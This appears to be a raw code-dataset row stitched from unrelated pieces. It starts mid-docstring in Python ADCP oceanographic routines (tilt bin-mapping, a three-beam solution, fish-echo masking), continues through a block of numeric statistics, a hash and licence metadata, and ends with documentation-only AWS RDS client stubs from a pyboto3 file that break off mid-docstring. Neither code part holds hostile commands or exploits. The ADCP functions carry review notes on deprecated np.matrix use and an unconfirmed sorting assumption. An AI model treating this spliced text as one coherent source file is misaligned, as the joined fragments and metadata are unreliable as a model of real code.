    theta, ptch and roll must be in RADIANS.

    Interpolate beam-coordinate velocities to fixed horizontal planes based on tilt angles
    (pitch and roll).

    NOTE(review): this function relies on np.matrix and its '*' matrix-multiply
    semantics; np.matrix is deprecated in NumPy -- porting to ndarray/@ should
    be done carefully, since '*' would become elementwise.
    """
    Sth = np.sin(theta)
    Cth = np.cos(theta)
    Sph2 = np.sin(ptch)
    Cph2 = np.cos(ptch)
    Sph3 = np.sin(roll)
    Cph3 = np.cos(roll)
    Z = r*Cth  # Target bin heights: the zero-tilt vertical bin positions.
    z00 = np.matrix([0, 0, -1]).T  # Unit vector pointing down.
    nz, nt = b1.shape
    # Beam direction (unit) vectors, one column per beam:
    #                b1    b2    b3    b4
    E = np.matrix([[-Sth, +Sth, 0, 0],
                   [ 0, 0, -Sth, +Sth],
                   [-Cth, -Cth, -Cth, -Cth]])
    Bo = np.dstack((b1[..., np.newaxis], b2[..., np.newaxis], b3[..., np.newaxis], b4[..., np.newaxis]))
    for i in range(4):
        Ei = E[:,i]
        Boi = Bo[:,:,i] # z, t, bi.
        bmi = Boi.copy()
        for k in range(nt):
            # Tilt (pitch-roll) rotation matrix for record k.
            PR = np.array([[Cph3[k], 0, Sph3[k]],
                           [Sph2[k]*Sph3[k], Cph2[k], -Sph2[k]*Cph3[k]],
                           [-Sph3[k]*Cph2[k], Sph2[k], Cph2[k]*Cph3[k]]])
            zi = np.array((PR*Ei).T*z00*r).squeeze() # Actual bin height, dot product of tilt matrix with along-beam distance vector.
            # NOTE(review): assume_sorted=True presumes zi is ascending along
            # the beam -- TODO confirm this holds for all tilt signs.
            bmi[:,k] = interp1d(zi, Boi[:,k], kind=how, fill_value="extrapolate", assume_sorted=True)(Z)
        Bo[:,:,i] = bmi  # Write the mapped beam back in place.
    return Bo[:,:,0], Bo[:,:,1], Bo[:,:,2], Bo[:,:,3]
def binmap5(b1, b2, b3, b4, b5, r, theta, ptch, roll, how='linear'):
    """
    USAGE
    -----
    b1m, b2m, b3m, b4m, b5m = binmap5(b1, b2, b3, b4, b5, r, theta, ptch, roll, how='linear')

    theta, ptch and roll must be in RADIANS.

    Interpolate beam-coordinate velocities to fixed horizontal planes based on tilt angles
    (pitch and roll). Five-beam variant of binmap(): the extra column handles
    the vertical (5th) beam.

    NOTE(review): relies on np.matrix '*' matrix-multiply semantics (deprecated
    in NumPy) -- see the note on binmap().
    """
    Sth = np.sin(theta)
    Cth = np.cos(theta)
    Sph2 = np.sin(ptch)
    Cph2 = np.cos(ptch)
    Sph3 = np.sin(roll)
    Cph3 = np.cos(roll)
    Z = r*Cth  # Target bin heights: the zero-tilt vertical bin positions.
    z00 = np.matrix([0, 0, -1]).T  # Unit vector pointing down.
    nz, nt = b1.shape
    # Beam direction (unit) vectors, one column per beam (b5 points straight down):
    #                b1    b2    b3    b4   b5
    E = np.matrix([[-Sth, +Sth, 0, 0, 0],
                   [ 0, 0, -Sth, +Sth, 0],
                   [-Cth, -Cth, -Cth, -Cth, -1]])
    Bo = np.dstack((b1[..., np.newaxis], b2[..., np.newaxis], b3[..., np.newaxis], b4[..., np.newaxis], b5[..., np.newaxis]))
    for i in range(5):
        Ei = E[:,i]
        Boi = Bo[:,:,i] # z, t, bi.
        bmi = Boi.copy()
        for k in range(nt):
            # Tilt (pitch-roll) rotation matrix for record k.
            PR = np.array([[Cph3[k], 0, Sph3[k]],
                           [Sph2[k]*Sph3[k], Cph2[k], -Sph2[k]*Cph3[k]],
                           [-Sph3[k]*Cph2[k], Sph2[k], Cph2[k]*Cph3[k]]])
            zi = np.array((PR*Ei).T*z00*r).squeeze() # Actual bin height, dot product of tilt matrix with along-beam distance vector.
            # NOTE(review): assume_sorted=True presumes zi is ascending along
            # the beam -- TODO confirm this holds for all tilt signs.
            bmi[:,k] = interp1d(zi, Boi[:,k], kind=how, fill_value="extrapolate", assume_sorted=True)(Z)
        Bo[:,:,i] = bmi  # Write the mapped beam back in place.
    return Bo[:,:,0], Bo[:,:,1], Bo[:,:,2], Bo[:,:,3], Bo[:,:,4]
def janus3beamsol(b1, b2, b3, b4):
    """
    Usage
    -----
    b1, b2, b3, b4 = janus3beamsol(b1, b2, b3, b4)

    Calculates a three-beam solution for a bad beam when the other three Janus
    beams have good data. The arrays are modified in place and also returned.

    Setting the error velocity const*(b1 + b2 - b3 - b4) to zero gives the
    constraint b1 + b2 = b3 + b4, which is solved for the single missing beam.
    """
    n_bins, n_recs = b1.shape
    beams = (b1, b2, b3, b4)
    for t in range(n_recs):
        for z in range(n_bins):
            samples = np.array([b[z, t] for b in beams])
            bad = np.flatnonzero(np.isnan(samples))
            if bad.size != 1:  # Only one bad beam allowed for 3-beam solutions.
                continue
            i = bad[0]
            if i == 0:    # Beam 1 is bad.
                beams[0][z, t] = samples[2] + samples[3] - samples[1]
            elif i == 1:  # Beam 2 is bad.
                beams[1][z, t] = samples[2] + samples[3] - samples[0]
            elif i == 2:  # Beam 3 is bad.
                beams[2][z, t] = samples[0] + samples[1] - samples[3]
            else:         # Beam 4 is bad.
                beams[3][z, t] = samples[0] + samples[1] - samples[2]
    return b1, b2, b3, b4
def mskfish(b1, b2, b3, b4, amp1, amp2, amp3, amp4, threshold=50):
    """
    USAGE
    -----
    b1, b2, b3, b4 = mskfish(b1, b2, b3, b4, amp1, amp2, amp3, amp4, threshold=50)

    Screens beam velocities for fish contamination using the echo
    amplitudes. In each cell, if the strongest echo exceeds the weakest
    echo by more than `threshold` counts, the weakest beam is flagged
    bad (NaN); if the strongest echo also exceeds the second-weakest by
    more than `threshold`, all four beams are flagged. Cell k+1 is
    flagged together with cell k because the echo is measured at the end
    of the cell. Returns masked copies; the inputs are not modified.

    REFERENCE
    ---------
    ADCP Coordinate transformation: Formulas and calculations (2010), p 22-23
    P/N 951-6079-00 (January 2010), Teledyne RD Instruments
    Available at:
    http://www.teledynemarine.com/Documents/Brand%20Support/RD%20INSTRUMENTS/
    Technical%20Resources/Manuals%20and%20Guides/General%20Interest/Coordinate_Transformation.pdf
    """
    ncells, nprofs = b1.shape
    lastcell = ncells - 1
    out = [b.copy() for b in (b1, b2, b3, b4)]
    for t in range(nprofs):
        # Work on one profile at a time as an (ncells, 4) beam matrix.
        beams = np.column_stack((b1[:, t], b2[:, t], b3[:, t], b4[:, t]))
        for k in range(ncells):
            echoes = np.array([amp1[k, t], amp2[k, t], amp3[k, t], amp4[k, t]])
            order = np.argsort(echoes)           # Weakest and second-weakest echo first.
            weakest, second = order[0], order[1]
            strongest = echoes.max()
            if strongest - echoes[weakest] > threshold:   # Fish in at least 1 beam.
                beams[k, weakest] = np.nan                # Mark k-th cell as bad.
                if k < lastcell:                          # Echo measured at the end of the cell,
                    beams[k + 1, weakest] = np.nan        # so cell k+1 is bad too.
                if strongest - echoes[second] > threshold:   # Fish in at least 2 beams.
                    beams[k, :] = np.nan                     # Mark all beams as bad.
                    if k < lastcell:
                        beams[k + 1, :] = np.nan
        for j in range(4):
            out[j][:, t] = beams[:, j]
    return out[0], out[1], out[2], out[3]
def getmskfish(amp1, amp2, amp3, amp4, threshold=50):
    """
    USAGE
    -----
    msk1, msk2, msk3, msk4 = getmskfish(amp1, amp2, amp3, amp4, threshold=50)

    Builds fish-contamination masks (1 = good, NaN = bad) from the four
    echo amplitudes, one mask per beam. In each cell, if the strongest
    echo exceeds the weakest by more than `threshold` counts, the weakest
    beam is flagged; if it also exceeds the second-weakest by more than
    `threshold`, all four beams are flagged. Cell k+1 is flagged together
    with cell k because the echo is measured at the end of the cell.

    REFERENCE
    ---------
    ADCP Coordinate transformation: Formulas and calculations (2010), p 22-23
    P/N 951-6079-00 (January 2010), Teledyne RD Instruments
    Available at:
    http://www.teledynemarine.com/Documents/Brand%20Support/RD%20INSTRUMENTS/
    Technical%20Resources/Manuals%20and%20Guides/General%20Interest/Coordinate_Transformation.pdf
    """
    ncells, nprofs = amp1.shape
    lastcell = ncells - 1
    masks = [np.ones((ncells, nprofs)) for _ in range(4)]
    for t in range(nprofs):
        # One profile at a time: (ncells, 4) matrix of mask values.
        col = np.ones((ncells, 4))
        for k in range(ncells):
            echoes = np.array([amp1[k, t], amp2[k, t], amp3[k, t], amp4[k, t]])
            order = np.argsort(echoes)           # Weakest and second-weakest echo first.
            peak = echoes.max()
            if peak - echoes[order[0]] > threshold:   # Fish in at least 1 beam.
                col[k, order[0]] = np.nan             # Flag k-th cell.
                if k < lastcell:                      # Echo measured at the end of the cell,
                    col[k + 1, order[0]] = np.nan     # so flag cell k+1 too.
                if peak - echoes[order[1]] > threshold:   # Fish in at least 2 beams.
                    col[k, :] = np.nan                    # Flag all beams.
                    if k < lastcell:
                        col[k + 1, :] = np.nan
        for j, m in enumerate(masks):
            m[:, t] = col[:, j]
    return masks[0], masks[1], masks[2], masks[3]
| 37.878462
| 163
| 0.520775
| 3,302
| 24,621
| 3.881284
| 0.123259
| 0.014045
| 0.019195
| 0.025593
| 0.895053
| 0.88647
| 0.875858
| 0.866417
| 0.859785
| 0.847222
| 0
| 0.05863
| 0.333577
| 24,621
| 649
| 164
| 37.936826
| 0.722452
| 0.497421
| 0
| 0.704861
| 0
| 0
| 0.058129
| 0
| 0
| 0
| 0
| 0
| 0.020833
| 1
| 0.03125
| false
| 0.006944
| 0.010417
| 0
| 0.072917
| 0.041667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d8356547bfcdc1160b7b20fdba7f9bc82e6b549d
| 434,487
|
py
|
Python
|
pyboto3/rds.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
pyboto3/rds.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
pyboto3/rds.py
|
thecraftman/pyboto3
|
653a0db2b00b06708334431da8f169d1f7c7734f
|
[
"MIT"
] | null | null | null |
'''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def add_role_to_db_cluster(DBClusterIdentifier=None, RoleArn=None):
    """
    Associates an Identity and Access Management (IAM) role with an Aurora DB cluster. For more information, see Authorizing Amazon Aurora to Access Other AWS Services On Your Behalf .
    See also: AWS API Documentation
    :example: response = client.add_role_to_db_cluster(
        DBClusterIdentifier='string',
        RoleArn='string'
    )
    :type DBClusterIdentifier: string
    :param DBClusterIdentifier: [REQUIRED]
    The name of the DB cluster to associate the IAM role with.
    :type RoleArn: string
    :param RoleArn: [REQUIRED]
    The Amazon Resource Name (ARN) of the IAM role to associate with the Aurora DB cluster, for example arn:aws:iam::123456789012:role/AuroraAccessRole .
    """
    # NOTE(review): documentation-only stub; the body is a no-op and returns None.
    pass
def add_source_identifier_to_subscription(SubscriptionName=None, SourceIdentifier=None):
    """
    Adds a source identifier to an existing RDS event notification subscription.
    See also: AWS API Documentation
    Examples
    This example adds a source identifier to an event notification subscription.
    Expected Output:
    :example: response = client.add_source_identifier_to_subscription(
        SubscriptionName='string',
        SourceIdentifier='string'
    )
    :type SubscriptionName: string
    :param SubscriptionName: [REQUIRED]
    The name of the RDS event notification subscription you want to add a source identifier to.
    :type SourceIdentifier: string
    :param SourceIdentifier: [REQUIRED]
    The identifier of the event source to be added. An identifier must begin with a letter and must contain only ASCII letters, digits, and hyphens; it cannot end with a hyphen or contain two consecutive hyphens.
    Constraints:
    If the source type is a DB instance, then a DBInstanceIdentifier must be supplied.
    If the source type is a DB security group, a DBSecurityGroupName must be supplied.
    If the source type is a DB parameter group, a DBParameterGroupName must be supplied.
    If the source type is a DB snapshot, a DBSnapshotIdentifier must be supplied.
    :rtype: dict
    :return: {
        'EventSubscription': {
            'CustomerAwsId': 'string',
            'CustSubscriptionId': 'string',
            'SnsTopicArn': 'string',
            'Status': 'string',
            'SubscriptionCreationTime': 'string',
            'SourceType': 'string',
            'SourceIdsList': [
                'string',
            ],
            'EventCategoriesList': [
                'string',
            ],
            'Enabled': True|False,
            'EventSubscriptionArn': 'string'
        }
    }
    :returns:
    (string) --
    """
    # NOTE(review): documentation-only stub; the body is a no-op and returns None.
    pass
def add_tags_to_resource(ResourceName=None, Tags=None):
    """
    Adds metadata tags to an Amazon RDS resource. These tags can also be used with cost allocation reporting to track cost associated with Amazon RDS resources, or used in a Condition statement in an IAM policy for Amazon RDS.
    For an overview on tagging Amazon RDS resources, see Tagging Amazon RDS Resources .
    See also: AWS API Documentation
    Examples
    This example adds a tag to an option group.
    Expected Output:
    :example: response = client.add_tags_to_resource(
        ResourceName='string',
        Tags=[
            {
                'Key': 'string',
                'Value': 'string'
            },
        ]
    )
    :type ResourceName: string
    :param ResourceName: [REQUIRED]
    The Amazon RDS resource the tags will be added to. This value is an Amazon Resource Name (ARN). For information about creating an ARN, see Constructing an RDS Amazon Resource Name (ARN) .
    :type Tags: list
    :param Tags: [REQUIRED]
    The tags to be assigned to the Amazon RDS resource.
    (dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
    Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    :return: response = client.add_tags_to_resource(
        ResourceName='arn:aws:rds:us-east-1:992648334831:og:mymysqloptiongroup',
        Tags=[
            {
                'Key': 'Staging',
                'Value': 'LocationDB',
            },
        ],
    )
    print(response)
    """
    # NOTE(review): documentation-only stub; the body is a no-op and returns None.
    pass
def apply_pending_maintenance_action(ResourceIdentifier=None, ApplyAction=None, OptInType=None):
    """
    Applies a pending maintenance action to a resource (for example, to a DB instance).
    See also: AWS API Documentation
    Examples
    This example immediately applies a pending system update to a DB instance.
    Expected Output:
    :example: response = client.apply_pending_maintenance_action(
        ResourceIdentifier='string',
        ApplyAction='string',
        OptInType='string'
    )
    :type ResourceIdentifier: string
    :param ResourceIdentifier: [REQUIRED]
    The RDS Amazon Resource Name (ARN) of the resource that the pending maintenance action applies to. For information about creating an ARN, see Constructing an RDS Amazon Resource Name (ARN) .
    :type ApplyAction: string
    :param ApplyAction: [REQUIRED]
    The pending maintenance action to apply to this resource.
    Valid values: system-update , db-upgrade
    :type OptInType: string
    :param OptInType: [REQUIRED]
    A value that specifies the type of opt-in request, or undoes an opt-in request. An opt-in request of type immediate cannot be undone.
    Valid values:
    immediate - Apply the maintenance action immediately.
    next-maintenance - Apply the maintenance action during the next maintenance window for the resource.
    undo-opt-in - Cancel any existing next-maintenance opt-in requests.
    :rtype: dict
    :return: {
        'ResourcePendingMaintenanceActions': {
            'ResourceIdentifier': 'string',
            'PendingMaintenanceActionDetails': [
                {
                    'Action': 'string',
                    'AutoAppliedAfterDate': datetime(2015, 1, 1),
                    'ForcedApplyDate': datetime(2015, 1, 1),
                    'OptInStatus': 'string',
                    'CurrentApplyDate': datetime(2015, 1, 1),
                    'Description': 'string'
                },
            ]
        }
    }
    """
    # NOTE(review): documentation-only stub; the body is a no-op and returns None.
    pass
def authorize_db_security_group_ingress(DBSecurityGroupName=None, CIDRIP=None, EC2SecurityGroupName=None, EC2SecurityGroupId=None, EC2SecurityGroupOwnerId=None):
    """
    Enables ingress to a DBSecurityGroup using one of two forms of authorization. First, EC2 or VPC security groups can be added to the DBSecurityGroup if the application using the database is running on EC2 or VPC instances. Second, IP ranges are available if the application accessing your database is running on the Internet. Required parameters for this API are one of CIDR range, EC2SecurityGroupId for VPC, or (EC2SecurityGroupOwnerId and either EC2SecurityGroupName or EC2SecurityGroupId for non-VPC).
    For an overview of CIDR ranges, go to the Wikipedia Tutorial .
    See also: AWS API Documentation
    Examples
    This example authorizes access to the specified security group by the specified CIDR block.
    Expected Output:
    :example: response = client.authorize_db_security_group_ingress(
        DBSecurityGroupName='string',
        CIDRIP='string',
        EC2SecurityGroupName='string',
        EC2SecurityGroupId='string',
        EC2SecurityGroupOwnerId='string'
    )
    :type DBSecurityGroupName: string
    :param DBSecurityGroupName: [REQUIRED]
    The name of the DB security group to add authorization to.
    :type CIDRIP: string
    :param CIDRIP: The IP range to authorize.
    :type EC2SecurityGroupName: string
    :param EC2SecurityGroupName: Name of the EC2 security group to authorize. For VPC DB security groups, EC2SecurityGroupId must be provided. Otherwise, EC2SecurityGroupOwnerId and either EC2SecurityGroupName or EC2SecurityGroupId must be provided.
    :type EC2SecurityGroupId: string
    :param EC2SecurityGroupId: Id of the EC2 security group to authorize. For VPC DB security groups, EC2SecurityGroupId must be provided. Otherwise, EC2SecurityGroupOwnerId and either EC2SecurityGroupName or EC2SecurityGroupId must be provided.
    :type EC2SecurityGroupOwnerId: string
    :param EC2SecurityGroupOwnerId: AWS account number of the owner of the EC2 security group specified in the EC2SecurityGroupName parameter. The AWS Access Key ID is not an acceptable value. For VPC DB security groups, EC2SecurityGroupId must be provided. Otherwise, EC2SecurityGroupOwnerId and either EC2SecurityGroupName or EC2SecurityGroupId must be provided.
    :rtype: dict
    :return: {
        'DBSecurityGroup': {
            'OwnerId': 'string',
            'DBSecurityGroupName': 'string',
            'DBSecurityGroupDescription': 'string',
            'VpcId': 'string',
            'EC2SecurityGroups': [
                {
                    'Status': 'string',
                    'EC2SecurityGroupName': 'string',
                    'EC2SecurityGroupId': 'string',
                    'EC2SecurityGroupOwnerId': 'string'
                },
            ],
            'IPRanges': [
                {
                    'Status': 'string',
                    'CIDRIP': 'string'
                },
            ],
            'DBSecurityGroupArn': 'string'
        }
    }
    :returns:
    DescribeDBSecurityGroups
    AuthorizeDBSecurityGroupIngress
    CreateDBSecurityGroup
    RevokeDBSecurityGroupIngress
    """
    # NOTE(review): documentation-only stub; the body is a no-op and returns None.
    pass
def can_paginate(operation_name=None):
    """
    Check if an operation can be paginated.
    :type operation_name: string
    :param operation_name: The operation name. This is the same name
    as the method name on the client. For example, if the
    method name is create_foo, and you'd normally invoke the
    operation as client.create_foo(**kwargs), if the
    create_foo operation can be paginated, you can use the
    call client.get_paginator('create_foo').
    """
    # NOTE(review): documentation-only stub; the body is a no-op and returns None.
    pass
def copy_db_cluster_parameter_group(SourceDBClusterParameterGroupIdentifier=None, TargetDBClusterParameterGroupIdentifier=None, TargetDBClusterParameterGroupDescription=None, Tags=None):
    """
    Copies the specified DB cluster parameter group.
    See also: AWS API Documentation
    Examples
    This example copies a DB cluster parameter group.
    Expected Output:
    :example: response = client.copy_db_cluster_parameter_group(
        SourceDBClusterParameterGroupIdentifier='string',
        TargetDBClusterParameterGroupIdentifier='string',
        TargetDBClusterParameterGroupDescription='string',
        Tags=[
            {
                'Key': 'string',
                'Value': 'string'
            },
        ]
    )
    :type SourceDBClusterParameterGroupIdentifier: string
    :param SourceDBClusterParameterGroupIdentifier: [REQUIRED]
    The identifier or Amazon Resource Name (ARN) for the source DB cluster parameter group. For information about creating an ARN, see Constructing an RDS Amazon Resource Name (ARN) .
    Constraints:
    Must specify a valid DB cluster parameter group.
    If the source DB cluster parameter group is in the same region as the copy, specify a valid DB parameter group identifier, for example my-db-cluster-param-group , or a valid ARN.
    If the source DB parameter group is in a different region than the copy, specify a valid DB cluster parameter group ARN, for example arn:aws:rds:us-east-1:123456789012:cluster-pg:custom-cluster-group1 .
    :type TargetDBClusterParameterGroupIdentifier: string
    :param TargetDBClusterParameterGroupIdentifier: [REQUIRED]
    The identifier for the copied DB cluster parameter group.
    Constraints:
    Cannot be null, empty, or blank
    Must contain from 1 to 255 alphanumeric characters or hyphens
    First character must be a letter
    Cannot end with a hyphen or contain two consecutive hyphens
    Example: my-cluster-param-group1
    :type TargetDBClusterParameterGroupDescription: string
    :param TargetDBClusterParameterGroupDescription: [REQUIRED]
    A description for the copied DB cluster parameter group.
    :type Tags: list
    :param Tags: A list of tags.
    (dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
    Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    :rtype: dict
    :return: {
        'DBClusterParameterGroup': {
            'DBClusterParameterGroupName': 'string',
            'DBParameterGroupFamily': 'string',
            'Description': 'string',
            'DBClusterParameterGroupArn': 'string'
        }
    }
    """
    # NOTE(review): documentation-only stub; the body is a no-op and returns None.
    pass
def copy_db_cluster_snapshot(SourceDBClusterSnapshotIdentifier=None, TargetDBClusterSnapshotIdentifier=None, KmsKeyId=None, PreSignedUrl=None, CopyTags=None, Tags=None, SourceRegion=None):
    """
    Copies a snapshot of a DB cluster.
    To copy a DB cluster snapshot from a shared manual DB cluster snapshot, SourceDBClusterSnapshotIdentifier must be the Amazon Resource Name (ARN) of the shared DB cluster snapshot.
    You can copy an encrypted DB cluster snapshot from another AWS region. In that case, the region where you call the CopyDBClusterSnapshot action is the destination region for the encrypted DB cluster snapshot to be copied to. To copy an encrypted DB cluster snapshot from another region, you must provide the following values:
    To learn how to generate a Signature Version 4 signed request, see Authenticating Requests: Using Query Parameters (AWS Signature Version 4) and Signature Version 4 Signing Process .
    To cancel the copy operation once it is in progress, delete the target DB cluster snapshot identified by TargetDBClusterSnapshotIdentifier while that DB cluster snapshot is in "copying" status.
    For more information on copying encrypted DB cluster snapshots from one region to another, see Copying a DB Cluster Snapshot in the Same Account, Either in the Same Region or Across Regions in the Amazon RDS User Guide.
    For more information on Amazon Aurora, see Aurora on Amazon RDS in the Amazon RDS User Guide.
    See also: AWS API Documentation
    Examples
    The following example copies an automated snapshot of a DB cluster to a new DB cluster snapshot.
    Expected Output:
    :example: response = client.copy_db_cluster_snapshot(
        SourceDBClusterSnapshotIdentifier='string',
        TargetDBClusterSnapshotIdentifier='string',
        KmsKeyId='string',
        CopyTags=True|False,
        Tags=[
            {
                'Key': 'string',
                'Value': 'string'
            },
        ],
        SourceRegion='string'
    )
    :type SourceDBClusterSnapshotIdentifier: string
    :param SourceDBClusterSnapshotIdentifier: [REQUIRED]
    The identifier of the DB cluster snapshot to copy. This parameter is not case-sensitive.
    You cannot copy an encrypted, shared DB cluster snapshot from one AWS region to another.
    Constraints:
    Must contain from 1 to 63 alphanumeric characters or hyphens.
    First character must be a letter.
    Cannot end with a hyphen or contain two consecutive hyphens.
    Must specify a valid system snapshot in the 'available' state.
    If the source snapshot is in the same region as the copy, specify a valid DB snapshot identifier.
    If the source snapshot is in a different region than the copy, specify a valid DB cluster snapshot ARN. For more information, go to Copying a DB Snapshot or DB Cluster Snapshot .
    Example: my-cluster-snapshot1
    :type TargetDBClusterSnapshotIdentifier: string
    :param TargetDBClusterSnapshotIdentifier: [REQUIRED]
    The identifier of the new DB cluster snapshot to create from the source DB cluster snapshot. This parameter is not case-sensitive.
    Constraints:
    Must contain from 1 to 63 alphanumeric characters or hyphens.
    First character must be a letter.
    Cannot end with a hyphen or contain two consecutive hyphens.
    Example: my-cluster-snapshot2
    :type KmsKeyId: string
    :param KmsKeyId: The AWS KMS key ID for an encrypted DB cluster snapshot. The KMS key ID is the Amazon Resource Name (ARN), KMS key identifier, or the KMS key alias for the KMS encryption key.
    If you copy an unencrypted DB cluster snapshot and specify a value for the KmsKeyId parameter, Amazon RDS encrypts the target DB cluster snapshot using the specified KMS encryption key.
    If you copy an encrypted DB cluster snapshot from your AWS account, you can specify a value for KmsKeyId to encrypt the copy with a new KMS encryption key. If you don't specify a value for KmsKeyId , then the copy of the DB cluster snapshot is encrypted with the same KMS key as the source DB cluster snapshot.
    If you copy an encrypted DB cluster snapshot that is shared from another AWS account, then you must specify a value for KmsKeyId .
    To copy an encrypted DB cluster snapshot to another region, you must set KmsKeyId to the KMS key ID you want to use to encrypt the copy of the DB cluster snapshot in the destination region. KMS encryption keys are specific to the region that they are created in, and you cannot use encryption keys from one region in another region.
    :type PreSignedUrl: string
    :param PreSignedUrl: The URL that contains a Signature Version 4 signed request for the CopyDBClusterSnapshot API action in the AWS region that contains the source DB cluster snapshot to copy. The PreSignedUrl parameter must be used when copying an encrypted DB cluster snapshot from another AWS region.
    The pre-signed URL must be a valid request for the CopyDBClusterSnapshot API action that can be executed in the source region that contains the encrypted DB cluster snapshot to be copied. The pre-signed URL request must contain the following parameter values:
    KmsKeyId - The KMS key identifier for the key to use to encrypt the copy of the DB cluster snapshot in the destination region. This is the same identifier for both the CopyDBClusterSnapshot action that is called in the destination region, and the action contained in the pre-signed URL.
    DestinationRegion - The name of the region that the DB cluster snapshot will be created in.
    SourceDBClusterSnapshotIdentifier - The DB cluster snapshot identifier for the encrypted DB cluster snapshot to be copied. This identifier must be in the Amazon Resource Name (ARN) format for the source region. For example, if you are copying an encrypted DB cluster snapshot from the us-west-2 region, then your SourceDBClusterSnapshotIdentifier looks like the following example: arn:aws:rds:us-west-2:123456789012:cluster-snapshot:aurora-cluster1-snapshot-20161115 .
    To learn how to generate a Signature Version 4 signed request, see Authenticating Requests: Using Query Parameters (AWS Signature Version 4) and Signature Version 4 Signing Process .
    Please note that this parameter is automatically populated if it is not provided. Including this parameter is not required
    :type CopyTags: boolean
    :param CopyTags: True to copy all tags from the source DB cluster snapshot to the target DB cluster snapshot; otherwise false. The default is false.
    :type Tags: list
    :param Tags: A list of tags.
    (dict) --Metadata assigned to an Amazon RDS resource consisting of a key-value pair.
    Key (string) --A key is the required name of the tag. The string value can be from 1 to 128 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    Value (string) --A value is the optional value of the tag. The string value can be from 1 to 256 Unicode characters in length and cannot be prefixed with 'aws:' or 'rds:'. The string can only contain the set of Unicode letters, digits, white-space, '_', '.', '/', '=', '+', '-' (Java regex: '^([\p{L}\p{Z}\p{N}_.:/=+\-]*)$').
    :type SourceRegion: string
    :param SourceRegion: The ID of the region that contains the snapshot to be copied.
    :rtype: dict
    :return: {
        'DBClusterSnapshot': {
            'AvailabilityZones': [
                'string',
            ],
            'DBClusterSnapshotIdentifier': 'string',
            'DBClusterIdentifier': 'string',
            'SnapshotCreateTime': datetime(2015, 1, 1),
            'Engine': 'string',
            'AllocatedStorage': 123,
            'Status': 'string',
            'Port': 123,
            'VpcId': 'string',
            'ClusterCreateTime': datetime(2015, 1, 1),
            'MasterUsername': 'string',
            'EngineVersion': 'string',
            'LicenseModel': 'string',
            'SnapshotType': 'string',
            'PercentProgress': 123,
            'StorageEncrypted': True|False,
            'KmsKeyId': 'string',
            'DBClusterSnapshotArn': 'string',
            'SourceDBClusterSnapshotArn': 'string',
            'IAMDatabaseAuthenticationEnabled': True|False
        }
    }
    :returns:
    TargetDBClusterSnapshotIdentifier - The identifier for the new copy of the DB cluster snapshot in the destination region.
    SourceDBClusterSnapshotIdentifier - The DB cluster snapshot identifier for the encrypted DB cluster snapshot to be copied. This identifier must be in the ARN format for the source region and is the same value as the SourceDBClusterSnapshotIdentifier in the pre-signed URL.
    """
    # NOTE(review): documentation-only stub; the body is a no-op and returns None.
    pass
def copy_db_parameter_group(SourceDBParameterGroupIdentifier=None, TargetDBParameterGroupIdentifier=None, TargetDBParameterGroupDescription=None, Tags=None):
    """
    Copies the specified DB parameter group.
    See also: AWS API Documentation
    Examples
    This example copies a DB parameter group.
    Expected Output:
    :example: response = client.copy_db_parameter_group(
        SourceDBParameterGroupIdentifier='string',
        TargetDBParameterGroupIdentifier='string',
        TargetDBParameterGroupDescription='string',
        Tags=[
            {
                'Key': 'string',
                'Value': 'string'
            },
        ]
    )
    :type SourceDBParameterGroupIdentifier: string
    :param SourceDBParameterGroupIdentifier: [REQUIRED]
    The identifier or ARN for the source DB parameter group. For information about creating an ARN, see Constructing an RDS Amazon Resource Name (ARN) .
    Constraints:
    Must specify a valid DB parameter group.
    Must specify a valid DB parameter group identifier, for example my-db-param-group , or a valid ARN.
    :type TargetDBParameterGroupIdentifier: string
